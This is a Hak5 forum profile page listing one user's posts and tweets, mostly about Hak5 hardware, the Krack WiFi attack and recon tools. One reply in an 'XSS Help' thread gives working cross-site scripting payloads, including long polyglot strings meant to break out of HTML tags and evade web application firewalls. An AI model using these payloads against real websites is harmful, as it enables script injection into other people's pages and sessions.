Jump to content


Active Members
  • Posts

  • Joined

  • Last visited

  • Days Won


Recent Profile Visitors

4,180 profile views

zoro25's Achievements

  1. @nest are there plans to link facial recognition to https://t.co/hEW9dj8Cuz it seems backward that I have to relink… https://t.co/nRpvfOP2NQ

  2. A Krack module would be nice - - - -just putting it out there
  3. @firt @kickstarter @elonmusk Been there and had the same thing happen, @kickstarter won't do anything, In my case,… https://t.co/wtR4kI6fKI

  4. Just saw that you already mention Builtwith, That's who I use to profile things like this. https://builtwith.com/hak5.com They also have a browser plugin, It's very easy to use their API or just scrape for an app you would write yourself. I also use TCPIPUtils for looking up networking info, (subdomains etc) https://www.tcpiputils.com/browse/domain/hak5.com I then also do a few other things, but builtwith and TCPIPUtlis are my main 2
  5. zoro25

    XSS Help

    Also, I would suggest looking in the console of your browser for errors when injecting. As already mentioned without knowing the app or js/html of page it's hard to give a working payload However, you can try either -->'";</ScriPT><sCriPt><confirm()</scRiPt> Which may better break out of the HTML and is nice and short (similar to what you tried but I included single and double quotes and also the end of a comment just in case you end up in a comment section. Or you can try a polyglot injection payload, (these will usually set off a WebApp Firewall but feel free to try) javascript:/*-->]]>%>?></script></title></textarea></noscript></style></xmp>"><img -/style=a:expression&#40&#47&#42'/-/*&#39,/**/eval(name)/*%2A///*///&#41;;width:100%;height:100%;position:absolute;-ms-behavior:url(#default#time2) name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>" Or jaVasCript:alert(1)//" name=alert(1) onErrOr=eval(name) src=1 autofocus oNfoCus=eval(name)><marquee><img src=x onerror=alert(1)></marquee>" ></textarea\></|\><details/open/ontoggle=prompt`1` ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>\'-->" ></script><sCrIpt>confirm(1)</scRipt>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>\'"><!-- which are both attempting to do the same thing. Good luck . ***** EDIT While it's not my intention to pop alerts on the hak5 forum, you can see that one of the polyglots is working as planned and is breaking out of tags to show a broken image, This is the equivalent of <img src="x" /> From here you would just need to tweak the code to pop an alert on a broken image, remember to read the console and attempt to bypassing protections. onerror=confirm() or something similar for a basic pop on a broken image. ****
  6. @CrookdHillary @MatthewKick No idea where you get your 0-6months as Cornell law , https://t.co/tPgUmFHu6X states 5 years max

  7. @testertested Never feel bad about screwing up, we all that (in one way or another). The fact that you realized it… https://t.co/syGpmMyjPX

  8. @mattbarcomb I've worked at 3 companies where this is encouraged @CPM__UK @Microsoft & @Skype, 1 of the 54 likes th… https://t.co/2S6ycD1qvk

  9. I think you guys are missing the R&D costs, If you look at Seytonic he pushes (or sells) Malduino but the Malduino uses DuckyScript as it's language. Who invented DuckyScript . Hak5 , OKay so it's not massively hard to come up with a new simple scripting language or even using the Malduino for USB automation, but no one else did it in a small easy to use package. That's what Hak5 brings, ease of use and some resemblance of support (I say resemblance as most of the support is from the community so it's hit or miss) . Sure you can do a lot of the pineapple stuff via a Linux OS with your network cards in Promiscuous mode but the Pineapples just give you a nice small package which to carry out your engagement. Seytonic is great and his guides are awesome for those with less cash, but lots of Hak5 customers are businesses/Govt agencies or just people with a passion for security who don't mind paying a little extra for the community. Hak5 if anything has been a bit of victim of its success and its customer base grew massively over the last few years (pineapple5 onwards) and it seems only now the dev team is beginning to catch up to cope with that larger customer expectation. Bringing Seb was a good start back at the start of Pineapple5, but he and Darren have always been swamped. For example almost 2 weeks after the source for Kracked was leaked (openly available) which is the biggest thing to happen to WIFI in about 10 years , The pineapples still haven't got modules/new firmware (in fact while I'm on it the firmware is over a year old) Lets hope with the larger Dev team things get better.
  10. Does anyone know anything about that "Friday thing" mentioned in today's Hak5 video? or what I'm guessing is a new PineApple firmware release or at least a new Krack module ****EDIT**** (after watching it back it seems that the Friday thing may have been last weeks Packet Squirrel announcement, I watched the recorded streams but didn't see anything new pineapple or Krack related)
  11. @smartthings @nvidiashield Thanks for the clarification

  12. @Random_Robbie Good work ,

  13. @sxcurity Yes that's it, thanks

  14. Remember to say to yourself that this is just a moment and it will pass. Now may seem dark and gray but it will pa… https://t.co/FeUw2pNNUf

  15. @troyhunt Tipple Wammy :-(

  • Create New...